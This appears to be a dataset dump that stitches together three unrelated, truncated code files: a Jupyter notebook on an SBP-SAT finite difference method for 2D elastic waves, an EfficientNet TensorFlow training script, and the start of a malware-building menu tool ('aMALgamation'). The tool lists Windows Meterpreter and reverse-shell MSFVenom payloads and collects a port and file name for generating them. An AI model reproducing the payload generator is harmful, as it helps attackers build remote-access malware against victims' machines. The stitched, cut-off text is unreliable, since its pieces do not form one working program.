input stringlengths 2.65k 237k | output stringclasses 1
value |
|---|---|
# ---
# jupyter:
# jupytext:
# text_representation:
# extension: .py
# format_name: light
# format_version: '1.4'
# jupytext_version: 1.2.4
# kernelspec:
# display_name: Python 3
# language: python
# name: python3
# ---
# <div style='background-image: url("../../../share/images/header.svg") ; padding: 0px ; background-size: cover ; border-radius: 5px ; height: 250px'>
# <div style="float: right ; margin: 50px ; padding: 20px ; background: rgba(255 , 255 , 255 , 0.7) ; width: 50% ; height: 150px">
# <div style="position: relative ; top: 50% ; transform: translatey(-50%)">
# <div style="font-size: xx-large ; font-weight: 900 ; color: rgba(0 , 0 , 0 , 0.8) ; line-height: 100%">Computational Seismology</div>
# <div style="font-size: large ; padding-top: 20px ; color: rgba(0 , 0 , 0 , 0.5)"> SBP-SAT finite difference method for the 2D elastic wave equation in velocity-stress form </div>
# </div>
# </div>
# </div>
# This notebook is based on the paper [Dynamic earthquake rupture simulations on nonplanar faults embedded in 3D geometrically complex, heterogeneous Earth models](https://pangea.stanford.edu/~edunham/publications/Duru_Dunham_FD3d_JCP16.pdf), and on the theory of summation-by-parts (SBP) finite difference methods and weak implementation of boundary conditions using the simultaneous-approximation-term (SAT).
#
#
# ##### Authors:
# * <NAME>
#
# ---
# ## Basic Equations ##
#
# Consider the 2D elastic wave equation in a heterogeneous rectangular, $(x,y) \in [0, L_x]\times [0, L_y]$, isotropic elastic solid
#
# \begin{align}
# \rho(x,y)\frac{\partial u(x, y,t)}{\partial t} -\frac{\partial \sigma_{xx}(x,y,t)}{\partial x} -\frac{\partial \sigma_{xy}(x,y,t)}{\partial y} & = 0,\\
# \rho(x,y)\frac{\partial v(x,y,t)}{\partial t} -\frac{\partial \sigma_{xy}(x,y,t)}{\partial x} -\frac{\partial \sigma_{yy}(x,y,t)}{\partial y} & = 0, \\
# S \begin{pmatrix}
# \frac{\partial \sigma_{xx}(x,y,t)}{\partial t}\\
# \frac{\partial \sigma_{yy}(x,y,t)}{\partial t}\\
# \frac{\partial \sigma_{xy}(x,y,t)}{\partial t}
# \end{pmatrix}
# -\begin{pmatrix}
# \frac{\partial u(x,y,t)}{\partial x}\\
# \frac{\partial v(x,y,t)}{\partial y}\\
# \frac{\partial v(x,y,t)}{\partial x} + \frac{\partial u(x,y,t)}{\partial y}
# \end{pmatrix}&=0
# \end{align}
#
# with $\rho(x,y)$ the density, $S$ is the compliance matrix with $S = C^{-1}$, and $C = C^T > 0$ is the matrix of elastic coefficients defined
# \begin{align}
# C= \begin{pmatrix}
# 2\mu + \lambda & \lambda & 0 \\
# \lambda & 2\mu + \lambda & 0 \\
# 0 & 0 & \mu \\
# \end{pmatrix}.
# \end{align}
#
# Here, $\lambda$ and $\mu$ are the Lame parameters satisfying $\mu >0$, $2\mu + \lambda > 0$.
# The elastic wave equation supports two families of waves p-wave and s-wave defined by the wavespeeds $c_p = \sqrt{\left(2\mu + \lambda\right)/\rho}$, $c_s = \sqrt{\mu/\rho}$. At the boundaries $ x = 0, x = L_x$, $ y = 0, y = L_y$ we pose the general well-posed linear boundary conditions
#
# \begin{equation}
# \begin{split}
# B_{p0x}(u, \sigma_{xx}, Z_p, r_0)=\frac{Z_p}{2}\left({1-r_0}\right){u} -\frac{1+r_0}{2} {\sigma_{xx}} = 0, \quad B_{s0x}(v, \sigma_{xy}, Z_s, r_0)=\frac{Z_s}{2}\left({1-r_0}\right){v} -\frac{1+r_0}{2} {\sigma_{xy}} = 0, \quad x = 0, \\
# B_{pLx}(u, \sigma_{xx}, Z_p, r_n)=\frac{Z_p}{2}\left({1-r_n}\right){u} +\frac{1+r_n}{2} {\sigma_{xx}} = 0, \quad B_{sLx}(v, \sigma_{xy}, Z_s, r_n)=\frac{Z_s}{2}\left({1-r_n}\right){v} +\frac{1+r_n}{2} {\sigma_{xy}} = 0, \quad x = L_x, \\
# B_{p0y}(v, \sigma_{yy}, Z_p, r_0)=\frac{Z_p}{2}\left({1-r_0}\right){v} -\frac{1+r_0}{2} {\sigma_{yy}} = 0, \quad B_{s0y}(u, \sigma_{xy}, Z_s, r_0)=\frac{Z_s}{2}\left({1-r_0}\right){u} -\frac{1+r_0}{2} {\sigma_{xy}} = 0, \quad y = 0, \\
# B_{pLx}(v, \sigma_{yy}, Z_p, r_n)=\frac{Z_p}{2}\left({1-r_n}\right){v} +\frac{1+r_n}{2} {\sigma_{yy}} = 0, \quad B_{sLy}(u, \sigma_{xy}, Z_s, r_n)=\frac{Z_s}{2}\left({1-r_n}\right){u} +\frac{1+r_n}{2} {\sigma_{xy}} = 0, \quad y = L_y, \\
# \end{split}
# \end{equation}
#
# with the elastic wave impedances $Z_p = \rho c_p$, $Z_s = \rho c_s$, and the reflection coefficients $r_0$, $r_n$ being real numbers and $|r_0|, |r_n| \le 1$.
#
# Note that, while $r_j = -1$ yields soft wall, $r_j = 0$ yields an absorbing boundary, and with $r_j = 1$ we have a hard wall boundary condition.
#
# In the coming analysis, we will set $F(x,y,t) =0$ to simplify the algebra.
#
# Introduce the mechanical energy defined by
# \begin{equation}
# E(t) = \int_0^{L_y}\int_0^{L_x}{\left(\frac{\rho(x, y)}{2} \left(u^2(x, y, t) + v^2(x, y, t)\right)
# + \frac{1}{2}
# \begin{pmatrix}
# \sigma_{xx}(x,y,t)\\
# \sigma_{yy}(x,y,t)\\
# \sigma_{xy}(x,y,t)
# \end{pmatrix}^T
# S
# \begin{pmatrix}
# \sigma_{xx}(x,y,t)\\
# \sigma_{yy}(x,y,t)\\
# \sigma_{xy}(x,y,t)
# \end{pmatrix}
# \right) dxdy},
# \end{equation}
#
# where $E(t)$ is the sum of the kinetic energy and the strain energy.
# We have
#
# \begin{equation}
# \frac{d E(t)}{dt} = BT_x + BT_y \le 0,
# \end{equation}
#
# where
#
# \begin{align}
# BT_x = \int_0^{L_y}\left(\left(u(L_x, y, t)\sigma_{xx}(L_x, y, t) - u(0, y, t)\sigma_{xx}(0, y, t)\right) + \left(v(L_x, y, t)\sigma_{xy}(L_x, y, t) - v(0, y, t)\sigma_{xy}(0, y, t)\right) \right)dy\\
# BT_y = \int_0^{L_x}\left(\left(v(x, L_y, t)\sigma_{yy}(x, L_y, t) - v(x, 0, t)\sigma_{yy}(x, 0, t)\right) + \left(u(x, L_y, t)\sigma_{xy}(x, L_y, t) - u(x, 0, t)\sigma_{xy}(x, 0, t)\right) \right)dx
# \end{align}
#
# From the boundary conditions, it is easy to check that $ BT_x \ge 0$, $ BT_y \ge 0$ for all $|r_0|, |r_n| \le 1$. This energy loss through the boundaries is what the numerical method should emulate.
#
# 1) Discretize the spatial domain:
# \begin{align}
# x_i = (i-1)\Delta{x}, \quad i = 1, 2, \dots, N_x, \quad \Delta{x} = \frac{L_x}{N_x-1}, \quad y_j = (j-1)\Delta{y}, \quad j = 1, 2, \dots, N_y, \quad \Delta{y} = \frac{L_y}{N_y-1}.
# \end{align}
#
# Denote a nodal approximation of the solution on the grid by $\mathbf{v}(t) = [v_{i,j}(t)]$, where $v_{i,j}(t) \approx v(x_i, y_j, t)$.
#
#
# 2) Introduce $\mathbf{D}$, a one space dimensional finite difference matrix satisfying the summation-by-parts property:
#
# \begin{align}
# \mathbf{D} = \mathbf{H}^{-1}\mathbf{Q}, \quad \mathbf{Q} + \mathbf{Q} = \left(\boldsymbol{e}_{N}\boldsymbol{e}_{N}^T -\boldsymbol{e}_{1}\boldsymbol{e}_{1}^T\right), \quad \mathbf{H}^T = \mathbf{H} > 0,
# \end{align}
#
# where, $\boldsymbol{e}_{0} = [1, 0, \dots, 0 ]^T, \quad \boldsymbol{e}_{L} = [ 0, 0, \dots, 1 ]^T$ and $\mathbf{H}$ defines a dicrete norm. We consider only diagonal norm SBP operators with $H_{jj} = h_j > 0$, and define the quadrature rule
#
# \begin{equation}
# \sum_{i = 1}^{N} f(x_j)h_j \approx \int_{0}^{L}f(x) dx, \quad h_j = \alpha_j \Delta{x},
# \end{equation}
# where $\alpha_j > 0$ are dimensionless quadrature weights.
#
# The operator can be easily extended to multiple dimensions using Kronecker products:
# \begin{equation}
# \mathbf{D}_x = \left(\mathbf{D}\otimes \mathbf{I}\right), \quad \mathbf{D}_y = \left(\mathbf{I}\otimes \mathbf{D}\right),
# \end{equation}
# where $\mathbf{I}$ is the identity matrix.
#
# The second order accurate SBP operator for first derivative is:
# \begin{align}
# \left(\mathbf{D}_x\mathbf{v}\right)_{i,j} = \frac{v_{i+1,j}-v_{i-1, j}}{2 \Delta{x}}, \quad i = 2, 3, \cdots N_x-1, \quad
# \left(\mathbf{D}_x\mathbf{v}\right)_{1,j} = \frac{v_{2,j}-v_{1,j}}{\Delta{x}},\quad
# \left(\mathbf{D}_x\mathbf{v}\right)_{N_xj} = \frac{v_{N_x,j}-v_{N_x-1,j}}{\Delta{x}}.
# \end{align}
#
# \begin{align}
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,j} = \frac{v_{i,j+1}-v_{i, j-1}}{2 \Delta{y}}, \quad j = 2, 3, \cdots N_y-1, \quad
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,j} = \frac{v_{i,2}-v_{i,1}}{\Delta{y}},\quad
# \left(\mathbf{D}_y\mathbf{v}\right)_{i,N_y} = \frac{v_{i, N_y}-v_{i, N_y-1}}{\Delta{y}}.
# \end{align}
#
#
#
# Note that the interior stencils are centered, with second order accuracy and the boundary stencils are one-sided and first order accurate.
#
# Higher order SBP operators can be found in the book: High Order Difference Methods for Time Dependent PDE, by <NAME>. In this notebook we implement SBP operators with interior accuracy 2, 4 and 6. The implementation of the spatial derivative operators can be found in the file first_derivative_sbp_operators.py
#
# To construct a stable semi-discrete approximation we replace the spatial derivatives by the SBP operators, and add the boundary conditions as SAT-terms with special penalty weights having:
#
# \begin{align}
# \rho_{i,j}\frac{d u_{i,j}(t)}{d t} -\left(\mathbf{D}_x \boldsymbol{\sigma}_{xx}\right)_{i,j} -\left(\mathbf{D}_ y\boldsymbol{\sigma}_{xy}\right)_{i,j} & = -\left(\frac{1}{h_1^{(x)}}SAT^{(1y)}_{pi,j} + \frac{1}{h_{N_x}^{(x)}}SAT^{(Nx)}_{pi,j} + \frac{1}{h_1^{(y)}}SAT^{(1y)}_{si,j} + \frac{1}{h_{N_y}^{(y)}}SAT^{(Ny)}_{si,j}\right),\\
# \rho_{i,j}\frac{d v_{i,j}(t)}{d t} - \left(\mathbf{D}_x \boldsymbol{\sigma}_{xy}\right)_{i,j} - \left(\mathbf{D}_y \boldsymbol{\sigma}_{yy}\right)_{i,j} & = -\left(\frac{1}{h_1^{(x)}}SAT^{(1x)}_{si,j} + \frac{1}{h_{N_x}^{(x)}}SAT^{(Ny)}_{si,j} + \frac{1}{h_1^{(y)}}SAT^{(1y)}_{pi,j} + \frac{1}{h_{N_y}^{(y)}}SAT^{(Ny)}_{pi,j}\right), \\
# \mathbf{S}_{i,j} \begin{pmatrix}
# \frac{d \sigma_{xxi,j}(t)}{d t}\\
# \frac{d \sigma_{yyi,j}(t)}{d t}\\
# \frac{d \sigma_{xyi,j}(t)}{d t}
# \end{pmatrix}
# -\begin{pmatrix}
# \left(\mathbf{D}_x \mathbf{u}\right)_{i,j}\\
# \left(\mathbf{D}_y \mathbf{v}\right)_{i,j}\\
# \left(\mathbf{D}_x \mathbf{v}\right)_{i,j} + \left(\mathbf{D}_y \mathbf{u}\right)_{i,j}
# \end{pmatrix}&=
# \begin{pmatrix}
# \frac{1}{Z_{pi,j}h_1^{(x)}}SAT^{(1x)}_{pi,j} - \frac{1}{Z_{pi,j}h_{N_x}^{(x)}}SAT^{(Nx)}_{pi,j}\\
# \frac{1}{Z_{pi,j}h_1^{(y)}}SAT^{(1y)}_{pi,j} - \frac{1}{Z_{pi,j}h_{N_y}^{(y)}}SAT^{(Ny)}_{pi,j}\\
# \frac{1}{Z_{si,j}h_1^{(x)}}SAT^{(1x)}_{si,j} - \frac{1}{Z_{si,j}h_{N_x}^{(x)}}SAT^{(Nx)}_{si,j}\frac{1}{Z_{si,j}h_1^{(y)}}SAT^{(1y)}_{si,j} - \frac{1}{Z_{si,j}h_{N_y}^{(y)}}SAT^{(Ny)}_{si,j}
# \end{pmatrix}
# \end{align}
#
#
# where
#
# \begin{align}
# h_i^{(x)} = \alpha_i \Delta{x}, \quad h_j^{(y)} = \alpha_j \Delta{y},
# \end{align}
#
# and $l = p, s$
#
# \begin{align}
# SAT^{(1x)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{l0x}, \quad i = 1\\
# 0, \quad i \ne 1
# \end{array} \right.
# \quad
# SAT^{(Nx)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{lLx}, \quad i = N_x\\
# 0, \quad i \ne N_x
# \end{array} \right.
# \end{align}
#
# \begin{align}
# SAT^{(1y)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{l0y}, \quad j = 1\\
# 0, \quad j \ne 1
# \end{array} \right.
# \quad
# SAT^{(Ny)}_{li,j} = \left \{
# \begin{array}{rl}
# B_{lLy}, \quad j = N_y\\
# 0, \quad j \ne N_y
# \end{array} \right.
# \end{align}
#
# Numerical implementation of the spatial derivatives and the boundary conditions are realized in the file rate2D.py.
#
#
# Approximate the mechanical energy by the above quadrature rule, having
# \begin{align}
# \mathcal{E}( t) = \sum_{i=1}^{N_x}\sum_{j=1}^{N_y}\left(\frac{\rho_{i,j}}{2} \left(u^2_{i,j}(t) + v^2_{i,j}(t)\right)
# + \frac{1}{2}
# \begin{pmatrix}
# \sigma_{xxi,j}(t)\\
# \sigma_{yyi,j}(t)\\
# \sigma_{xyi,j}(t)
# \end{pmatrix}^T
# S_{i,j}
# \begin{pmatrix}
# \sigma_{xxi,j}(t)\\
# \sigma_{yyi,j}(t)\\
# \sigma_{xyi,j}(t)
# \end{pmatrix}
# \right)h_i^{(x)}h_j^{(y)} > 0.
# \end{align}
#
# The semi-discrete approximation satisfies the energy equation:
# \begin{align}
# \frac{d \mathcal{E}( t)}{d t} = BT_{x}(t) + BT_{y}(t) \le 0,
# \end{align}
#
# where the boundary terms $BT_{\xi}$, $\xi = x, y$, are given by
#
# \begin{align}
# BT_{x}(t) = &-\frac{1}{2}\sum_{j =1}^{N_y}\left(\left(1-r_0\right)Z_{p1,j}u_{1,j}^2(t) + \frac{\left(1+r_0\right)}{Z_{p1,j}}\sigma_{xx1,j}^2(t) +
# \left(1-r_n\right)Z_{pN_x,j}u_{N_x,j}^2(t) + \frac{\left(1+r_n\right)}{Z_{pN_x,j}}\sigma_{xxN_x,j}^2(t)\right)h_j^{(y)}\\
# &-\frac{1}{2}\sum_{j | |
<filename>models/official/efficientnet/main.py
# Copyright 2019 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Train a EfficientNets on ImageNet on TPU."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import os
import time
from absl import app
from absl import flags
import numpy as np
import tensorflow as tf
import efficientnet_builder
import imagenet_input
import utils
from edgetpu import efficientnet_edgetpu_builder
from tensorflow.contrib.tpu.python.tpu import async_checkpoint
from tensorflow.contrib.training.python.training import evaluation
from tensorflow.core.protobuf import rewriter_config_pb2
from tensorflow.python.estimator import estimator
FLAGS = flags.FLAGS
FAKE_DATA_DIR = 'gs://cloud-tpu-test-datasets/fake_imagenet'
flags.DEFINE_bool(
'use_tpu', default=True,
help=('Use TPU to execute the model for training and evaluation. If'
' --use_tpu=false, will use whatever devices are available to'
' TensorFlow by default (e.g. CPU and GPU)'))
# Cloud TPU Cluster Resolvers
flags.DEFINE_string(
'tpu', default=None,
help='The Cloud TPU to use for training. This should be either the name '
'used when creating the Cloud TPU, or a grpc://ip.address.of.tpu:8470 url.')
flags.DEFINE_string(
'gcp_project', default=None,
help='Project name for the Cloud TPU-enabled project. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
flags.DEFINE_string(
'tpu_zone', default=None,
help='GCE zone where the Cloud TPU is located in. If not specified, we '
'will attempt to automatically detect the GCE project from metadata.')
# Model specific flags
flags.DEFINE_string(
'data_dir', default=FAKE_DATA_DIR,
help=('The directory where the ImageNet input data is stored. Please see'
' the README.md for the expected data format.'))
flags.DEFINE_string(
'model_dir', default=None,
help=('The directory where the model and training/evaluation summaries are'
' stored.'))
flags.DEFINE_string(
'model_name',
default='efficientnet-b0',
help=('The model name among existing configurations.'))
flags.DEFINE_string(
'mode', default='train_and_eval',
help='One of {"train_and_eval", "train", "eval"}.')
flags.DEFINE_string(
'autoaugment_name', default=None,
help='If value is None, then AutoAugment will not be used. Available '
'options are: v0.')
flags.DEFINE_integer(
'train_steps', default=218949,
help=('The number of steps to use for training. Default is 218949 steps'
' which is approximately 350 epochs at batch size 2048. This flag'
' should be adjusted according to the --train_batch_size flag.'))
flags.DEFINE_integer(
'input_image_size', default=None,
help=('Input image size: it depends on specific model name.'))
flags.DEFINE_integer(
'train_batch_size', default=2048, help='Batch size for training.')
flags.DEFINE_integer(
'eval_batch_size', default=1024, help='Batch size for evaluation.')
flags.DEFINE_integer(
'num_train_images', default=1281167, help='Size of training data set.')
flags.DEFINE_integer(
'num_eval_images', default=50000, help='Size of evaluation data set.')
flags.DEFINE_integer(
'steps_per_eval', default=6255,
help=('Controls how often evaluation is performed. Since evaluation is'
' fairly expensive, it is advised to evaluate as infrequently as'
' possible (i.e. up to --train_steps, which evaluates the model only'
' after finishing the entire training regime).'))
flags.DEFINE_integer(
'eval_timeout',
default=None,
help='Maximum seconds between checkpoints before evaluation terminates.')
flags.DEFINE_bool(
'skip_host_call', default=False,
help=('Skip the host_call which is executed every training step. This is'
' generally used for generating training summaries (train loss,'
' learning rate, etc...). When --skip_host_call=false, there could'
' be a performance drop if host_call function is slow and cannot'
' keep up with the TPU-side computation.'))
flags.DEFINE_integer(
'iterations_per_loop', default=1251,
help=('Number of steps to run on TPU before outfeeding metrics to the CPU.'
' If the number of iterations in the loop would exceed the number of'
' train steps, the loop will exit before reaching'
' --iterations_per_loop. The larger this value is, the higher the'
' utilization on the TPU.'))
flags.DEFINE_integer(
'num_parallel_calls', default=64,
help=('Number of parallel threads in CPU for the input pipeline'))
flags.DEFINE_string(
'bigtable_project', None,
'The Cloud Bigtable project. If None, --gcp_project will be used.')
flags.DEFINE_string(
'bigtable_instance', None,
'The Cloud Bigtable instance to load data from.')
flags.DEFINE_string(
'bigtable_table', 'imagenet',
'The Cloud Bigtable table to load data from.')
flags.DEFINE_string(
'bigtable_train_prefix', 'train_',
'The prefix identifying training rows.')
flags.DEFINE_string(
'bigtable_eval_prefix', 'validation_',
'The prefix identifying evaluation rows.')
flags.DEFINE_string(
'bigtable_column_family', 'tfexample',
'The column family storing TFExamples.')
flags.DEFINE_string(
'bigtable_column_qualifier', 'example',
'The column name storing TFExamples.')
flags.DEFINE_string(
'data_format', default='channels_last',
help=('A flag to override the data format used in the model. The value'
' is either channels_first or channels_last. To run the network on'
' CPU or TPU, channels_last should be used. For GPU, channels_first'
' will improve performance.'))
flags.DEFINE_integer(
'num_label_classes', default=1000, help='Number of classes, at least 2')
flags.DEFINE_float(
'batch_norm_momentum',
default=None,
help=('Batch normalization layer momentum of moving average to override.'))
flags.DEFINE_float(
'batch_norm_epsilon',
default=None,
help=('Batch normalization layer epsilon to override..'))
flags.DEFINE_bool(
'transpose_input', default=True,
help='Use TPU double transpose optimization')
flags.DEFINE_bool(
'use_bfloat16',
default=False,
help=('Whether to use bfloat16 as activation for training.'))
flags.DEFINE_string(
'export_dir',
default=None,
help=('The directory where the exported SavedModel will be stored.'))
flags.DEFINE_bool(
'export_to_tpu', default=False,
help=('Whether to export additional metagraph with "serve, tpu" tags'
' in addition to "serve" only metagraph.'))
flags.DEFINE_float(
'base_learning_rate',
default=0.016,
help=('Base learning rate when train batch size is 256.'))
flags.DEFINE_float(
'momentum', default=0.9,
help=('Momentum parameter used in the MomentumOptimizer.'))
flags.DEFINE_float(
'moving_average_decay', default=0.9999,
help=('Moving average decay rate.'))
flags.DEFINE_float(
'weight_decay', default=1e-5,
help=('Weight decay coefficiant for l2 regularization.'))
flags.DEFINE_float(
'label_smoothing', default=0.1,
help=('Label smoothing parameter used in the softmax_cross_entropy'))
flags.DEFINE_float(
'dropout_rate', default=None,
help=('Dropout rate for the final output layer.'))
flags.DEFINE_float(
'drop_connect_rate', default=None,
help=('Drop connect rate for the network.'))
flags.DEFINE_integer('log_step_count_steps', 64, 'The number of steps at '
'which the global step information is logged.')
flags.DEFINE_bool(
'use_cache', default=True, help=('Enable cache for training input.'))
flags.DEFINE_float(
'depth_coefficient', default=None,
help=('Depth coefficient for scaling number of layers.'))
flags.DEFINE_float(
'width_coefficient', default=None,
help=('WIdth coefficient for scaling channel size.'))
flags.DEFINE_bool(
'use_async_checkpointing', default=False, help=('Enable async checkpoint'))
def model_fn(features, labels, mode, params):
"""The model_fn to be used with TPUEstimator.
Args:
features: `Tensor` of batched images.
labels: `Tensor` of labels for the data samples
mode: one of `tf.estimator.ModeKeys.{TRAIN,EVAL,PREDICT}`
params: `dict` of parameters passed to the model from the TPUEstimator,
`params['batch_size']` is always provided and should be used as the
effective batch size.
Returns:
A `TPUEstimatorSpec` for the model
"""
if isinstance(features, dict):
features = features['feature']
# In most cases, the default data format NCHW instead of NHWC should be
# used for a significant performance boost on GPU. NHWC should be used
# only if the network needs to be run on CPU since the pooling operations
# are only supported on NHWC. TPU uses XLA compiler to figure out best layout.
if FLAGS.data_format == 'channels_first':
assert not FLAGS.transpose_input # channels_first only for GPU
features = tf.transpose(features, [0, 3, 1, 2])
stats_shape = [3, 1, 1]
else:
stats_shape = [1, 1, 3]
if FLAGS.transpose_input and mode != tf.estimator.ModeKeys.PREDICT:
features = tf.transpose(features, [3, 0, 1, 2]) # HWCN to NHWC
is_training = (mode == tf.estimator.ModeKeys.TRAIN)
has_moving_average_decay = (FLAGS.moving_average_decay > 0)
# This is essential, if using a keras-derived model.
tf.keras.backend.set_learning_phase(is_training)
tf.logging.info('Using open-source implementation.')
override_params = {}
if FLAGS.batch_norm_momentum is not None:
override_params['batch_norm_momentum'] = FLAGS.batch_norm_momentum
if FLAGS.batch_norm_epsilon is not None:
override_params['batch_norm_epsilon'] = FLAGS.batch_norm_epsilon
if FLAGS.dropout_rate is not None:
override_params['dropout_rate'] = FLAGS.dropout_rate
if FLAGS.drop_connect_rate is not None:
override_params['drop_connect_rate'] = FLAGS.drop_connect_rate
if FLAGS.data_format:
override_params['data_format'] = FLAGS.data_format
if FLAGS.num_label_classes:
override_params['num_classes'] = FLAGS.num_label_classes
if FLAGS.depth_coefficient:
override_params['depth_coefficient'] = FLAGS.depth_coefficient
if FLAGS.width_coefficient:
override_params['width_coefficient'] = FLAGS.width_coefficient
def normalize_features(features, mean_rgb, stddev_rgb):
"""Normalize the image given the means and stddevs."""
features -= tf.constant(mean_rgb, shape=stats_shape, dtype=features.dtype)
features /= tf.constant(stddev_rgb, shape=stats_shape, dtype=features.dtype)
return features
def build_model():
"""Build model using the model_name given through the command line."""
model_builder = None
if FLAGS.model_name.startswith('efficientnet-edgetpu'):
model_builder = efficientnet_edgetpu_builder
elif FLAGS.model_name.startswith('efficientnet'):
model_builder = efficientnet_builder
else:
raise ValueError(
'Model must be either efficientnet-b* or efficientnet-edgetpu*')
normalized_features = normalize_features(features, model_builder.MEAN_RGB,
model_builder.STDDEV_RGB)
logits, _ = model_builder.build_model(
normalized_features,
model_name=FLAGS.model_name,
training=is_training,
override_params=override_params,
model_dir=FLAGS.model_dir)
return logits
if params['use_bfloat16']:
with tf.contrib.tpu.bfloat16_scope():
logits = tf.cast(build_model(), tf.float32)
else:
logits = build_model()
if mode == tf.estimator.ModeKeys.PREDICT:
predictions = {
'classes': tf.argmax(logits, axis=1),
'probabilities': tf.nn.softmax(logits, name='softmax_tensor')
}
return tf.estimator.EstimatorSpec(
mode=mode,
predictions=predictions,
export_outputs={
'classify': tf.estimator.export.PredictOutput(predictions)
})
# If necessary, in the model_fn, use params['batch_size'] instead the batch
# size flags (--train_batch_size or --eval_batch_size).
batch_size = params['batch_size'] # pylint: disable=unused-variable
# Calculate loss, which includes softmax cross entropy and L2 regularization.
one_hot_labels = tf.one_hot(labels, FLAGS.num_label_classes)
cross_entropy = tf.losses.softmax_cross_entropy(
logits=logits,
onehot_labels=one_hot_labels,
label_smoothing=FLAGS.label_smoothing)
# Add weight decay to the loss for non-batch-normalization variables.
loss = cross_entropy + FLAGS.weight_decay * tf.add_n(
[tf.nn.l2_loss(v) for v in tf.trainable_variables()
if 'batch_normalization' not in v.name])
global_step = tf.train.get_global_step()
if has_moving_average_decay:
ema = tf.train.ExponentialMovingAverage(
decay=FLAGS.moving_average_decay, num_updates=global_step)
ema_vars = utils.get_ema_vars()
host_call = None
restore_vars_dict = None
if is_training:
# Compute | |
<gh_stars>10-100
#! /usr/bin/env python3
##MSVenom Basic Payloads
import os
import importlib
from importlib import util
spec = importlib.util.find_spec('.subserv', package='lib')
m = spec.loader.load_module()
customfolder = m.loc + "/aMALgamation/current/VenomCustom/"
if not os.path.exists(customfolder):
os.makedirs(customfolder)
## 32 bit MSFVenom MeterpreterShell
def venom():
os.system("clear")
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\t***MALWARE TIME!!!!!***\n\n" + m.bcolors.ENDC)
while (1):
print(m.bcolors.BLUE + "\t*******************************************************************" + m.bcolors.ENDC)
print(m.bcolors.BOLD + m.bcolors.GREEN + """
*******************************************************************
_ _ _ _ _ _ _ _ _ _ _ _
/ \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \ / \
( M | S | F | V | e | n | o | m ) ( M | e | n | u )
\_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/ \_/
""" + m.bcolors.ENDC)
print(
m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("\t(1)\tGenerate Windows 32bit payload")
print("\t(2)\tGenerate Windows 64bit payload")
print("\t(3)\tGenerate Mac 32bit Payload")
print("\t(4)\tGenerate Mac 64bit Payload")
print("\t(5)\tGenerate Custom Payload")
print(m.bcolors.ERROR + m.bcolors.BOLD + "\t****If you are using this section then you should know what you want. I will try to help, BUT you must not be a NOOB!!" + m.bcolors.ENDC)
print("\t(99)\tGo back to the Custom Malware Menu")
print(
m.bcolors.GREEN + m.bcolors.BOLD + "\tAll payloads and RC files will be put in:" + m.bcolors.ERROR + customfolder + m.bcolors.ENDC)
print(m.bcolors.BLUE + "\t*******************************************************************" + m.bcolors.ENDC)
options = input("\nW4@+ Ma1w@r3 R U W@^t1ng Brobi-Wan: ")
if options == "1":
gen_win32()
elif options == "2":
gen_win64()
elif options == "3":
gen_mac32()
elif options == "4":
gen_mac64()
elif options == "5":
custom()
elif options == "99":
os.system("clear")
break
else:
input("You must be a Pats Fan! Come on pick something... ")
def gen_win32():
global customfolder
payload = "null"
port = "null"
filename = "null"
a = "windows/shell/bind_tcp"
b = "windows/shell/reverse_tcp"
c = "windows/shell/reverse_tcp_dns"
d = "windows/shell/reverse_udp"
e = "windows/shell_bind_tcp"
f = "windows/shell_reverse_tcp"
a1 = "windows/meterpreter/bind_tcp"
b1 = "windows/meterpreter/reverse_http"
c1 = "windows/meterpreter/reverse_https"
d1 = "windows/meterpreter/reverse_tcp"
e1 = "windows/meterpreter/reverse_tcp_dns"
a2 = "windows/meterpreter_bind_tcp"
b2 = "windows/meterpreter_reverse_http"
c2 = "windows/meterpreter_reverse_https"
d2 = "windows/meterpreter_reverse_tcp"
print(m.bcolors.ERROR + m.bcolors.BOLD + "\tAt any time you can go back to the menu by inputting q or Q" + m.bcolors.ENDC)
print(m.bcolors.GREEN + m.bcolors.BOLD + m.bcolors.UNDERLINE + "\tPayload Options\n\n" + m.bcolors.ENDC)
print(m.bcolors.ERROR + "\t*******************************************************************" + m.bcolors.ENDC)
print("""
Best Payloads to use
(a) ---%s
(b) ---%s
(c) ---%s
(d) ---%s
(e) ---%s
(f) ---%s
(a1)---%s
(b1)---%s
(c1)---%s
(d1)---%s
(e1)---%s
(a2)---%s
(b2)---%s
(c2)---%s
(d2)---%s
""" %(a, b, c, d, e, f, a1, b1, c1, d1, e1, a2, b2, c2, d2))
if (payload == "null"):
print(
"Please pick a payload type that meets your needs. Use the letter/number to pick the payload.. Example 'a' for windows/shell/bind_tcp\n")
payload = input("\tEnter payload type: ") or d2
if payload == 'a':
payload = a
elif payload == 'b':
payload = b
elif payload == 'c':
payload = c
elif payload == 'd':
payload = d
elif payload == 'e':
payload = e
elif payload == 'f':
payload = f
elif payload == 'a1':
payload = a1
elif payload == 'b1':
payload = b1
elif payload == 'c1':
payload = c1
elif payload == 'd1':
payload = d1
elif payload == 'e1':
payload = e1
elif payload == 'a2':
payload = a2
elif payload == 'b2':
payload = b2
elif payload == 'c2':
payload = c2
elif payload == 'd2':
payload = d2
elif payload == 'q' or 'Q':
return
else:
print(m.bcolors.ERROR + m.bcolors.BOLD + m.bcolors.UNDERLINE +"\t********Invalid payload***********" + m.bcolors.ENDC)
print("\tYour Payload is: %s" %(payload))
if (port == "null"):
port = input("\tWhat Port are you wanting to use?:")
if port == 'q':
return
elif port == 'Q':
return
else:
print("\tYour port is: " + port)
if (filename == "null"):
filename = input("\tWhat is the name of your file?:")
if filename == 'q':
return
elif filename == 'Q':
return
else:
print("\tFile name set to: " + filename)
